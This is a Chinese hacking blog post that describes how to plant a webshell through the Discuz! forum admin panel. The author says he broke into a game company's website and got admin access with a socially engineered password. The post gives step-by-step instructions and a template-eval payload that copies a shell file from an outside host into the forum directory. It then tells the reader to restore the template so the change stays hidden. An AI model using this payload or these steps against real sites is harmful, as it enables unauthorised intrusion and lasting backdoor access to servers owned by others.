Discuz!的最新后台通用拿Webshell法              ★★★ Dis

无意中入侵了游戏官方网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权去掉了),网上众所周知的编辑模板(模板编辑功能受限)办法来拿SHELL很是不爽,想起来编辑任意模板文件,然后eval出SHELL的方法,终于搞定!下面就是方法的实现步骤:
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.zeroplace.cn/shell.txt
3. 在任意位置输入:
{eval copy('http://www.zeroplace.cn/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样

大功告成, 访问/forumdata/shell.php便是可爱的马马


[本日志由 admin 于 2010-04-04 04:48 PM 编辑]

有什么问题可以加群,100852896
点击这里加入此群 在线提问
文章来自: 本站原创
Tags:
评论: 0 | 查看次数: 5627
博主QQ: 友情链接请找我
QQ群: 灰色档案
返回顶部 关闭